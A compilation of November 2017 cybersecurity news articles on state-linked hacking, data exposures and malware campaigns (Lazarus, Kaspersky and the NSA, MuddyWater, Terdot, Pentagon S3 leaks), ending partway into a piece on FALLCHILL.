21.11.2017 securityweek BigBrothers
At least two cybersecurity firms have noticed that the notorious Lazarus threat group, which many experts have linked to North Korea, has been using a new piece of Android malware to target smartphone users in South Korea.

Both McAfee and Palo Alto Networks published blog posts on Monday describing the latest campaign attributed to the threat actor also known as Hidden Cobra. The group is believed to be responsible for several high-profile attacks, including ones targeting Sony and financial institutions, and possibly even the recent WannaCry ransomware attack. Some of the operations tied to this group are Operation Blockbuster, Dark Seoul and Operation Troy.

The malware sample analyzed by McAfee, delivered as an APK file, has been designed to mimic a Korean bible app made available on Google Play by a developer named GODpeople. However, the malicious application did not make it onto the official app store and it’s unclear what method of distribution has been used.

“GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea,” explained McAfee’s Christiaan Beek and Raj Samani.

McAfee said the malware, which has been around since at least March, delivers a backdoor as an executable and linkable format (ELF) file. The backdoor allows hackers to collect information about the infected device, download and upload files, and execute commands. The list of command and control (C&C) servers used by the malware includes IP addresses previously linked to the Lazarus group.

Palo Alto Networks has not shared any information about the applications used to deliver the malware, but the company pointed out that the operation appears to be aimed at Samsung device users in South Korea.

The firm’s analysis started with a PE file uploaded to VirusTotal. This file is designed to deliver ELF ARM files and APK files from an HTTP server. The APK that represents the final payload provides backdoor capabilities and allows its operator to spy on the targeted user by recording audio via the microphone, capturing images via the camera, uploading and downloading files, harvesting GPS information, reading contacts, collecting SMS and MMS messages, recording browsing history, and capturing Wi-Fi information.

Palo Alto Networks has also found links between the malware and the Lazarus group, particularly to malware and infrastructure used in attacks on the SWIFT banking system and activities described in reports on Operation Blockbuster.

This is not the first time North Korea has reportedly targeted mobile users in the South. Back in 2014, South Korea’s National Intelligence Service said more than 20,000 smartphones had been infected that year with a piece of malware traced back to North Korea.

The reports from McAfee and Palo Alto Networks come less than a week after the U.S. Department of Homeland Security (DHS) published a report on a Hidden Cobra malware tracked as FALLCHILL.


Unprotected Pentagon Database Stored 1.8 Billion Internet Posts
20.11.2017 securityweek BigBrothers
Researchers have found an unprotected database storing 1.8 billion posts collected from social media services, news websites and forums by a contractor for the U.S. Department of Defense.

The data was discovered on September 6 by Chris Vickery, director of risk research at cyber resilience firm UpGuard, inside an AWS S3 storage bucket that was accessible to any user with an AWS account.

Based on the names of the subdomains storing it, the information appears to have been collected for the U.S. Central Command (CENTCOM) and the U.S. Pacific Command (PACOM), unified combatant commands of the Department of Defense.

The exposed records represent comments posted on news websites, forum messages, and posts from social media services such as Facebook, and they cover a wide range of topics, including sports, video games, celebrities and politics. The data had been collected between 2009 and present day.

While some of the posts appear to be written by American citizens, many of them are in Arabic, Farsi and various dialects spoken in Pakistan and Afghanistan.

“Arabic posts criticizing or mocking ISIS, posted to Facebook pages for Iraqi anti-jihadi groups, or Pashto language comments made on the official Facebook page of Pakistani politician Imran Khan, who has drawn scrutiny from both the Taliban and the US government, give some indication of content that might be of interest to CENTCOM in its prosecution of regional wars and against Islamic extremists,” UpGuard said in a blog post.

The vast amount of information has been set up for searches via Apache Lucene, a high-performance, full-featured text search engine library.

An analysis of the data showed that it was likely collected for the Pentagon by VendorX, a now-defunct private sector contractor. While it had been in operation, the company claimed it was working on Outpost, a “multi-lingual platform designed to positively influence change in high-risk youth in unstable regions of the world.” The project was exclusively run for CENTCOM.

While the exposed data has been collected from public sources, UpGuard believes the incident raises some questions about the privacy and civil liberties impact of the U.S. government’s intelligence operations. The leak also once again highlights the risks associated with third-party vendors.

The Department of Defense has secured the leaky database. The organization told CNN that the information is not collected or processed for any intelligence purposes. A representative of CENTCOM said the data is “used for measurement and engagement activities of our online programs on public sites,” but declined to elaborate.

This is not the first time UpGuard has found an unprotected AWS S3 bucket storing data belonging to a high profile organization. In the past months, the company discovered similar leaks tied to Accenture, the U.S. Republican Party, TigerSwan, Verizon, and the U.S. military.


According to UIDAI, more than 200 government websites made Aadhaar users’ details public
20.11.2017 securityaffairs BigBrothers

According to the Unique Identification Authority of India (UIDAI), Aadhaar details were displayed on 210 government websites.
The state government websites publicly displayed personal details such as names and addresses of Aadhaar users.

The Aadhaar is the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017.

The role of the system is crucial for both authenticating and authorizing transactions and is a pillar of the Indian UID (unique identification database).

The Aadhaar issuing body confirmed that the data was removed from the websites just after the data breach was noticed, but it did provide further details on the alleged hack.

Even if the UIDAI never publicly disclosed Aadhaar details public, more than 200 websites of central government and state government departments, were displaying the list of beneficiaries along with their name, address, other details and Aadhaar numbers.

“Though the UIDAI never made Aadhaar details public, 210 websites of central government and state government departments including educational institutes were displaying the list of beneficiaries along with their name, address, other details and Aadhaar numbers of general public.” reported the IndiaToday website.

Aadhaar system
The Aadhaar architecture has been designed to ensure the data security and privacy.

“Various policies and procedures have been defined, these are reviewed and updated continually thereby appropriately controlling and monitoring any movement of people, material and data in and out of UIDAI premises, particularly the data centres,” the UIDAI said.

The UIDAI confirmed that the security audits are conducted on a regular basis to improve the security and privacy of data, it confirmed the efforts to make the data safer and protected.


Terabytes of US military social media surveillance miserably left wide open in AWS S3 buckets
19.11.2017. securityaffairs BigBrothers

Three AWS S3 buckets containing dozen of terabytes resulting from surveillance on US social media were left wide open online.
It has happened again, other three AWS S3 buckets containing dozen of terabytes resulting from surveillance on US social media were left wide open online.

The misconfigured AWS S3 buckets contain social media posts and similar pages that were scraped from around the world by the US military to identify and profile persons of interest.

The huge trove of documents was discovered by the popular data breach hunter Chris Vickery, the three buckets were named centcom-backup, centcom-archive, and pacom-archive.

CENTCOM is the abbreviation for the US Central Command, the US Military command that covers the Middle East, North Africa and Central Asia, similarly PACOM is the for US Pacific Command that covers the Southern Asia, China and Australasia.

Vickery was conducting an ordinary scan for the word “COM” in publicly accessible S3 buckets when spotted the unsecured buckets, one of them contained 1.8 billion social media posts resulting from automatic craping activities conducted over the past eight years up to today. According to Vickery, it mainly contains postings made in central Asia, in many cases comments made by US individuals.

Documents reveal that the archive was collected as part of the US government’s Outpost program, which is a social media monitoring and narrowcasting campaign designed to target youngsters and educate them to despise the terrorism.

The archive discovered by Vickery in fact includes the Outpost development, configuration files, as well as Apache Lucene indexes of keywords designed to be used with the open-source search engine Elasticsearch.

“While public information about this firm is scant, an internet search reveals multiple individuals who worked for VendorX describing work building Outpost for CENTCOM and the Defense Department” reads the blog post published by Upguard.

US government AWS S3 buckets surveillance

Another folder titled “Coral” likely refers to the US Army’s “Coral Reef” intelligence software.

“This folder contains a directory named “INGEST” that contained all the posts scraped and held in the “centcom-backup” bucket. The Coral Reef program “allows users of intelligence to better understand relationships between persons of interest” as a component of the Distributed Common Ground System-Army (DCGS-A) intelligence suite, “the Army’s primary system for the posting of data, processing of information, and dissemination to all components and echelons of intelligence, surveillance and reconnaissance information about the threats, weather, and terrain” programs. Such a focus on gathering intelligence about “persons of interest” would be even more clear-cut in the other two buckets, starting with “centcom-archive.” continues the post.

US government AWS S3 buckets surveillance 2

The bucket “centcom-archive” contains an impressive volume of internet posts stored in the same XML text file format as seen in “centcom-backup,” at least 1.8 billion such posts are stored here.

“The bucket “centcom-archive” contains more scraped internet posts stored in the same XML text file format as seen in “centcom-backup,” only on a much larger scale: conservatively, at least 1.8 billion such posts are stored here.” states the post.

It is disturbing how this material was leaked online due to misconfigured AWS S3 buckets, foreign governments and terrorist organization may have had access to the archive such as Vickery.

Vickery notified the American military about the discovery and the buckets have now been locked down and hidden.

It isn’t the first time that data from US Military was discovered online, in September researchers from cybersecurity firmUpGuard discovered thousands of files containing personal data on former US military, intelligence, and government workers have allegedly been exposed online for months.


Kaspersky: NSA Worker's Computer Was Already Infected With Malware

17.11.2017 thehackernews BigBrothers

Refuting allegations that its anti-virus product helped Russian spies steal classified files from an NSA employee's laptop, Kaspersky Lab has released more findings that suggest the computer in question may have been infected with malware.
Moscow-based cyber security firm Kaspersky Lab on Thursday published the results of its own internal investigation claiming the NSA worker who took classified documents home had a personal home computer overwhelmed with malware.
According to the latest Kaspersky report, the telemetry data its antivirus collected from the NSA staffer's home computer contained large amounts of malware files which acted as a backdoor to the PC.
The report also provided more details about the malicious backdoor that infected the NSA worker's computer when he installed a pirated version of Microsoft Office 2013 .ISO containing the Mokes backdoor, also known as Smoke Loader.
Backdoor On NSA Worker's PC May Have Helped Other Hackers Steal Classified Documents
This backdoor could have allowed other hackers to steal classified documents and hacking tools belonging to the NSA from the machine of the employee, who worked for the Tailored Access Operations (TAO) group of hackers at the agency.
For those unaware, United States has banned Kaspersky antivirus software from all of its government computers over suspicion of Kaspersky's involvement with the Russian intelligence agency and spying fears.
Though there's no substantial evidence yet available, an article published by US news agency WSJ last month claimed that Kaspersky Antivirus helped Russian government hackers steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
However, the article, which quoted multiple anonymous sources, failed to provide any solid evidence to prove if Kaspersky was intentionally involved with the Russian spies or some hackers simply exploited some zero-day bug in the Antivirus product.
Kaspersky lives up to its claims that its antivirus software detected and collected the NSA classified files as part of its normal functionality, and has rigorously denied allegations it passed those documents onto the Russian government.
Now, in the recent report published by the anti-virus firm said between September 11, 2014, and November 17, 2014, Kaspersky Lab servers received confidential NSA materials multiple times from a poorly secured computer located in the United States.
The company's antivirus software, which was installed on the employee's PC, discovered that the files contained malware used by Equation Group, a 14-year-old NSA's elite hacking group that was exposed by Kaspersky in 2015.
Kaspersky Claims it Deleted All NSA Classified Files
Besides confidential material, the software also collected 121 separate malware samples (including a backdoor) which were not related to the Equation Group.
The report also insists that the company deleted all classified documents once one of its analysts realized that the antivirus had collected more than malicious binaries. Also, the company then created a special software tweak, preventing those files from being downloaded again.
"The reason we deleted those files and will delete similar ones in the future is two-fold; we do not need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials," Kaspersky Lab report reads.
"Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."
Trojan Discovered on NSA Worker's Computer
The backdoor discovered on the NSA staffer's PC was actually a Trojan, which was later identified as "Smoke Bot" or "Smoke Loader" and allegedly created by a Russian criminal hacker in 2011. It had also been advertised on Russian underground forums.
Interestingly, this Trojan communicated with the command and control servers apparently set up by a Chinese individual going by the name "Zhou Lou," using the e-mail address "zhoulu823@gmail.com."
Since executing the malware would not have been possible with the Kaspersky antivirus enabled, the staffer must have disabled the antivirus software to do so.
"Given that system owner's potential clearance level, the user could have been a prime target of nation states," the Kaspersky report reads.
"Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands."
More details on the backdoor can be found here.
For now, the Kaspersky anti-virus software has been banned by the U.S. Department of Homeland Security (DHS) from all of its government computers.
In the wake of this incident, Kaspersky Lab has recently launched a new transparency initiative that involves giving partners access to its antivirus source code and paying large bug bounties for security issues discovered in its products.


Who is behind MuddyWater in the Middle East? Likely a politically-motivated actor
17.11.2017 securityaffairs BigBrothers

Researchers are investigating a mysterious wave of attacks in the Middle East that was dubbed MuddyWater due to the confusion in attributing the.
Security experts at Palo Alto Networks are monitoring long-lasting targeted attacks aimed at entities in the Middle East and that are difficult to attribute.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

Threat actors used PowerShell-based first stage backdoor named POWERSTATS, across the time the hackers changed tools and techniques.

“This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming MuddyWater” states the analysis from PaloAlto Networks.

“MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.”

MuddyWater attackers used a set of weaponized documents that were also used in recently observed incidents targeting the Saudi Arabian government. The same set of documents is similar to ones associated with a series of attacks discovered by experts at Morphisec.

The malicious documents associated with this last wave of attacks had been tailored according to the target regions.

Some of the attacks were attributed to the FIN7 that launched a campaign aimed at employees involved in SEC Filings.

Palo Alto Networks believe that the recent wave of attacks might have been mistakenly associated with the FIN7 group, it also reported that a C&C server delivering the FIN7-linked DNSMessenger tool was in MuddyWater attacks as well.

The hackers maintained the same final payload while changing delivery methods between attacks.

“Based on these connections we can be confident that all the files and infrastructure […] are related, since more than one of these can be used to link each of the samples discussed in each case,” Palo Alto notes.

The hackers used well known tools, including Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more.

In some recent attacks, the threat actor used GitHub to host the POWERSTATS backdoor.

“In some of their recent attack documents, the attackers also used GitHub as a hosting site for their custom backdoor, POWERSTATS.” continues the analysis.

The experts managed a number of GitHub repositories related to their malware.

The experts observed compromised accounts at third party organizations sending the MuddyWater malware, in one case, the attackers sent a malicious document which appears nearly identical to a legitimate attachment which PaloAlto observed later being sent to the same recipient.

“This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it,” reported PaloAlto.

MuddyWater

According to Palo Alto Networks, past attribution of the attacks were wrong, the group in not financially motivated as previously thought, instead it politically motivated.

Threat actors might have planted a false flag to make hard the attribution.

“Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network,” the security researchers concluded.


Kaspersky provided further details on NSA Incident. Other APTs targeted the same PC
17.11.2017 securityaffairs BigBrothers

Kaspersky Lab publishes a full technical report related to hack of its antivirus software to steal NSA hacking code.
In October, anonymous source claimed that in 2015 the Russian intelligence stole NSA cyber weapons from the PC of one of its employees that was running the Kaspersky antivirus.

Kaspersky denies any direct involvement and provided further details about the hack, but it wasn’t a good period for the firm.

In September, the US Government banned the Russian security firm from all federal government systems.

The PC was hacked after the NSA employee installed a backdoored key generator for a pirated copy of Microsoft Office.

Kaspersky Lab, published in October a detailed report on the case that explains how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

In October many media accused Kaspersky of helping the Russian intelligence for the detection of the US cyber-weapons on the PC via its security solutions, but according to the security firm the situation is quite different.

According to the telemetry logs collected by the Russian firm, the staffer temporary switched off the antivirus protection on the PC, and infected his personal computer with a spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the NSA employee’s PC, some time later the employee disabled the Kaspersky software to execute the activation-key generator

Then the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky offered to hand over the source code of its solution to the US experts, to prove it wasn’t up involved in any cyber espionage operation.

Back to the present, Kaspersky published a new report that sheds the light on the investigation conducted by the firm on the NSA-linked Equation Group APT.

Kaspersky began running searches in its databases since June 2014, 6 months prior to the year the alleged hack of its antivirus, for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE amount of false positives.

The analysis revealed the presence of a specific signature that fired a large number of times in a short time span on just one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). This is the beginning of the analysis on the system that was found containing not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development.

“In total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users’ privacy.” states the new report published by Kaspersky.

“This was a hard decision, but should we make an exception once, even for the sake of protecting our own company’s reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.”

kaspersky

The analysis of the computer there the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of the Microsoft Office 2013, but the .ISO was containing the Mokes backdoor.

“What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as “kms.exe” (a name of a popular pirated software activation tool), and “kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions”. Kaspersky Lab products detected the malware with the verdict Backdoor.Win32.Mokes.hvl.” continues Kaspersky.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two month its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

Kaspersky explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

“Given that system owner’s potential clearance level, the user could have been a prime target of nation states,” Kaspersky said. “Adding the user’s apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands.”

Further details are included in the technical report.


White House Cyber Chief Provides Transparency Into Zero-Day Disclosure Process
16.11.2017 securityweek BigBrothers
Government Vulnerability Disclosure Process (VEP)

The U.S. government Wednesday introduced greater transparency into its Vulnerabilities Equities Policy (VEP) program. This is the process by which government agencies decide whether to disclose or stockpile the cyber vulnerabilities they discover.

In a lengthy statement, White House Cybersecurity Coordinator Rob Joyce explained why not all discoveries are disclosed. That will not change; but in introducing greater transparency into the process of decision-making, he hopes "to demonstrate to the American people that the Federal Government is carefully weighing the risks and benefits as we carry out this important mission."

The extent to which the government agencies use cyber vulnerabilities to further their own overseas missions became known with Edward Snowden's leaked documents. This sparked greater discussion over the morality of government collection and use of vulnerabilities without disclosing the existence of those vulnerabilities to the product vendors concerned.

Microsoft, for example, developed detailed proposals for introducing international norms of cyber behavior that would rely on no government keeping private supplies (hoarding) of undisclosed 0-day vulnerabilities; and also called for a digital Geneva Convention that would "mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them." This is unlikely to happen. "Our national capacity to find and hold criminals and other rogue actors accountable relies on cyber capabilities enabled by exploiting vulnerabilities in the digital infrastructure they use. Those exploits produce intelligence for attribution, evidence of crimes, enable defensive investigations, and posture us to respond to our adversaries with cyber capabilities," said Joyce in his statement.

The theft and release of 'Equation Group' (generally considered to be the NSA) tools and exploits by the Shadow Brokers (generally considered to be 'Russia') brought new emphasis to the issue. These tools included the EternalBlue exploit soon used by hackers (quite probably nation-state affiliated hackers) in the worldwide WannaCry and NotPetya ransomware outbreaks.

Joyce formerly served as head of the NSA’s Tailored Access Operations (TAO) unit—an offensive hacking team tasked with breaking into systems of foreign entities.

The unproven implication is that if the NSA had disclosed their vulnerabilities, the worldwide disruption caused by WannaCry and NotPetya might not have happened. There is, however, little mention of the danger of theft inherent in any store of vulnerabilities in this week's VEP transparency announcement, beyond two considerations in the decision process: "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG relationships with industry?", and "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG international relations?"

The full unclassified VEP process document (PDF) "describes the Vulnerabilities Equities Policy and Process for departments and agencies of the United States Government (USG) to balance equities and make determinations regarding disclosure or restriction when the USG obtains knowledge of newly discovered and not publicly known vulnerabilities in information systems and technologies."

In short, it explains the process without altering the policy. Its purpose is to introduce transparency and reassure the public that the government will weigh the offensive advantages obtained against the threat of public disruption if used by third-parties, for each 0-day vulnerability it discovers.

That transparency is valuable, but there remain numerous concerns. One is that the VEP continues to be an administrative exercise not enshrined in law. It can be changed at any time without public or legislative overview.

In May 2017, Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas) introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to promote the transparency introduced this week, but make it a legal requirement rather than an administrative choice. The Patch Act appears to have stalled, with no real progress since its introduction in May.

Other concerns appear in the Exceptions section of the VEP process document. For example, "The United States Government's decision to disclose or restrict vulnerability information could be subject to restrictions by partner agreements and sensitive operations." This will exclude 0-days discovered by, say, GCHQ and disclosed to the NSA under an effective non-disclosure agreement; and it could also exclude 0-days expected to be used in potential operations (such as Stuxnet).

It has long been suspected that members of the Five Eyes surveillance alliance share intelligence on each other's nationals to circumvent individual laws forbidding surveillance of own subjects. If this happens in practice, a similar arrangement between each members' intelligence agencies would exclude shared vulnerabilities from the VEP process. Both exclusions will undoubtedly be used by the more offense-driven agencies (the NSA and the CIA) to both hold and keep secret their most 'valuable' exploits.

Nevertheless, the purpose of declassifying the VEP process is primarily to reassure the American people that the secretive intelligence agencies do not have free rein in the vulnerabilities they keep and the vulnerabilities they use -- and to that extent it will probably succeed.


Kaspersky Shares More Details on NSA Incident
16.11.2017 securityweek  BigBrothers
Kaspersky Lab on Thursday shared more details from its investigation into reports claiming that Russian hackers stole data belonging to the U.S. National Security Agency (NSA) by exploiting the company’s software.

The Wall Street Journal reported last month that hackers working for the Russian government stole information on how the U.S. penetrates foreign networks and how it defends against cyberattacks. The files were allegedly taken in 2015 from the personal computer of an NSA contractor who had been using a security product from Kaspersky Lab.

The WSJ article suggested that Kaspersky either knowingly helped the Russian government obtain the files or that the hackers exploited vulnerabilities in the company’s software without the firm’s involvement.

In a preliminary report, Kaspersky said the incident referenced in the WSJ article likely took place in 2014, when the company was investigating malware used by the Equation Group, a threat actor later associated with the NSA.

In a more technical report published on Thursday, Kaspersky said the incident likely occurred between September 11, 2014 and November 17, 2014 – the security firm believes WSJ’s source may have mixed up the dates.

In September 2014, Kaspersky’s products detected malware associated with the Equation Group on a device with an IP address pointing to the Baltimore area in Maryland. It’s worth noting that the NSA headquarters are in Fort Meade, Maryland, less than 20 miles from the city of Baltimore.

The Kaspersky product present on the device automatically sent an archive containing the suspected malware files back to the company’s systems for further analysis. The said archive contained source code for Equation malware, along with four documents with classification markings (e.g. secret, confidential).

The Kaspersky analyst who found the archive informed the company’s CEO of its content and the decision was made to remove the files from its storage systems.

So is it possible that the classified files were somehow obtained by Russian actors from Kaspersky’s systems? The firm denies spying for the Russian government and claims the data was removed from its systems – only some statistics and metadata remain – but it cannot guarantee that its employees handled the data appropriately.

“We cannot assess whether the data was ‘handled appropriately’ (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so,” the company said.

While Kaspersky admitted that its systems were breached in 2015 by a threat group linked to Israeli intelligence, the company said it found no evidence that the NSA files left its systems.

As for the assumption that Kaspersky’s products may have been specifically configured to look for secret files on the systems they were installed on, the company said all the signatures for retrieving files from a user’s device are carefully handled and verified by an experienced developer, and there is no evidence that anyone created a signature for files marked “secret” during the Equation investigation.

The company determined that an analyst did create a signature for files with names that included the string “secret,” but it was for a piece of malware associated with the TeamSpy espionage campaign. The signature included a path specific for that malware to avoid false positives.

Another possible scenario is related to the fact that the device of the NSA contractor got infected with malware after the Kaspersky antivirus was disabled. The security product was temporarily disabled when the user attempted to install a pirated copy of Microsoft Office using a known activation tool.

After the antivirus was re-enabled, Kaspersky detected 121 threats on the system. The malware associated with the Office activation tool was Smoke Bot (aka Smoke Loader), which had been sold on Russian underground forums since 2011. At the time of the incident, the malware communicated with servers apparently set up by an individual located in China.

Kaspersky says it’s also possible that the contractor’s computer may have been infected with stealthy malware from a sophisticated threat actor that was not detected at the time.

Several recent media reports focused on Kaspersky’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of company’s products. As a result, the Department of Homeland Security (DHS) has ordered all government agencies to identify and remove the firm’s products, despite the apparent lack of evidence supporting the claims.

In an effort to clear its name, Kaspersky announced the launch of a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.


Terdot Banking Trojan Could Act as Cyber-Espionage Tool
16.11.2017 securityweek BigBrothers
The Terdot banking Trojan packs information-stealing capabilities that could easily turn it into a cyber-espionage tool, Bitdefender says in a new report.

Highly customized and sophisticated, Terdot is based on the source code of ZeuS, which leaked online in 2011. The banking Trojan resurfaced in October last year and Bitdefender has been tracking its whereabouts ever since, the security company notes in a technical paper (PDF).

Terdot was designed to operate as a proxy to perform man-in-the-middle (MitM) attacks, as well as to steal browser information such as login credentials or the stored credit card data. Furthermore, the malware is capable of injecting HTML code into visited web pages.

The malware relies more on legitimate applications for its nefarious purposes, including certificate injection tools, than on in-house developed software.

Although designed as a banking Trojan, Terdot’s capabilities go well beyond its primary purpose, Bitdefender notes. The threat can eavesdrop and modify traffic on social media and email platforms, and also packs automatic update features that allow it to download and execute any file provided by the operator.

This malware family mainly focuses on targeting Canadian institutions from the banking sector, but the analyzed samples would also target email service providers such as Microsoft’s live.com, Yahoo Mail, and Gmail. It also targets social networks such as Facebook, Twitter, Google Plus, and YouTube. According to Bitdefender, the malware avoids gathering data related to vk.com, the largest social platform in Russia.

The main distribution channel for the Trojan is the Sundown exploit kit, but Terdot was also observed spreading via malicious emails containing a button masquerading behind a PDF icon. When clicked on, it would execute obfuscated JavaScript code to download and run the malware file.

A complex chain of droppers, injections, and downloaders is used to deliver Terdot and third-party utilities employed by the threat, in an attempt to trick defenses and hinder analysis.

After infection, the malware injects itself into the browser process by hooking very-low network socket operations to direct connections to its own proxy and read traffic (which also allows it to alter traffic). Terdot can steal authentication data either by inspecting the client’s requests or by injecting spyware JavaScript code into the response.

The malware can also bypass secure connections by generating certificates for each of the domains the victim visits.

Terdot’s components are split across numerous processes, each with a specific role. Long-running Windows processes such as Windows Explorer, for example, are used either for injection purposes to spread the infection inside the machine or as watchdogs, to hinder disinfection. The malware uses the msiexec.exe process for running its MitM proxy.

In their technical analysis of the threat, Bitdefender’s security researchers explain that, after installation and initial handshake with the command and control server, the malware downloads updates and commands from the same URL it sends system information to (including a unique identifier, malware version, CRC32s of downloaded data, Windows version, processor architecture, system language, and network adapter IP).

The bot features support for a wide range of commands: can uninstall itself, can run a specified file, can execute a simple GET request, can add or remove URLs to/from a list that signals the proxy to disable injections for them, and can add or remove URLs to a blocking list. The malware also features a Domain Generation Algorithm (DGA).

“Terdot is a complex malware. Its modular structure, complex injections, and careful use of threads make it resilient, while its spyware and remote execution abilities make it extremely intrusive. Terdot goes above and beyond the capabilities of a banker Trojan. Its focus on harvesting credentials for other services such as social networks and email service providers could turn it into an extremely powerful cyber-espionage tool that is extremely difficult to spot and clean,” Bitdefender concludes.


UK Cyber Security Chief Blames Russia for Hacker Attacks
16.11.2017 securityweek BigBrothers
Russia has launched cyber attacks on the UK media, telecoms and energy sectors in the past year, Britain's cyber security chief said Wednesday amid reports of Russian interference in the Brexit referendum.

"Russia is seeking to undermine the international system. That much is clear," Ciaran Martin, head of Britain's National Cyber Security Centre (NCSC) said at a London tech conference, according to his office.

"Russian interference, seen by the NCSC over the past year, has included attacks on the UK media, telecommunications and energy sectors," Martin said.

The centre has coordinated the government's response to 590 significant incidents since its launch in 2016, although the government agency has not detailed which were linked to Russia.

Prime Minister Theresa May on Monday accused Moscow of "seeking to weaponise information" and "sow discord in the West and undermine our institutions".

Russia's cyber activities include "deploying its state-run media organisations to plant fake stories and photo-shopped images", she said in a speech.

The scathing criticism was rejected by Russia's foreign ministry, which accused May of trying to distract the British public from problems at home.

Moscow's alleged attempts to influence last year's referendum on Britain's membership of the European Union are part of investigations under way in London.

May told lawmakers on Wednesday that parliament's intelligence and security committee would be looking into Russian interference.

Meanwhile parliament's digital, culture, media and sport committee has requested data from Twitter and Facebook on Russia-linked accounts and aims to interview social media executives at the British embassy in Washington early next year.

- Pro-Brexit 'bots' -

Damian Collins, the committee chairman, said it was "beyond doubt" that Russia has interfered in UK politics.

He said there was a pattern of behaviour of Russian organisations seeking out opportunities to create division, unrest and instability in the West.

"Foreign organisations have the ability to manipulate social media platforms to target voters abroad," he told AFP.

"This is seriously-organised buildings of hundreds of people engaged in propagating every day fake news through social media."

He said it was "terrifying" how cheap and easy it was for them to reach millions of people.

"It is one of the biggest threats our democracies face and we have to be serious about combatting it," Collins added.

May's spokesman insisted: "There has been no evidence of successful interference in our electoral processes."

Researchers at the University of Edinburgh, who examined 2,752 accounts suspended by Twitter in the United States, found 419 were operating from the Russian Internet Research Agency and attempting to influence British politics, The Guardian reported.

Professor Laura Cram, the university's neuropolitics research director, told the newspaper they tweeted about Brexit 3,468 times -- mostly after the June 23 referendum.

The content overall was "quite chaotic and it seems to be aimed at wider disruption. There's not an absolutely clear thrust. We pick up a lot on refugees and immigration", she said.

Meanwhile researchers at Swansea University in Wales and the University of California, Berkeley, have found more than 150,000 Russian-based Twitter accounts which may have influenced the Brexit referendum.

The social media accounts switched their attention to EU membership in the run-up to the referendum, 2016, according to research outlined in The Times newspaper.

Many of the accounts were fully-automated "bot" profiles which posted hundreds of tweets daily, or "cyborg" accounts which were partially run by people, the newspaper said.

The majority of the posts were pro-Brexit, while some supported remaining in the European Union.

Meanwhile it was revealed that a tweet which caused a furore after the Westminster terror attack in March originally came from a trolling agency account which, according to evidence before the US Congress, is backed by the Russian government.

The tweet showing a picture of a woman in a headscarf walking next to a victim, with the words: "Muslim woman pays no mind to the terror attack, casually walks by a dying man while checking phone".


U.S. Government Shares Details of FALLCHILL Malware Used by North Korea
15.11.2017 securityweek  BigBrothers
FALLCHILL Malware Used by North Korean Government Hackers is a Fully Functional RAT, DHS Says

The United States Department of Homeland Security (DHS) shared details of a hacking tool they say is being used by a threat group linked to the North Korean government known as “Hidden Cobra.”

The threat actor dubbed by the U.S. government “Hidden Cobra” is better known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and financial organizations in Poland. Links have also been found between the threat actor and the recent WannaCry ransomware attacks, but some experts are skeptical.

FALLCHILL Malware

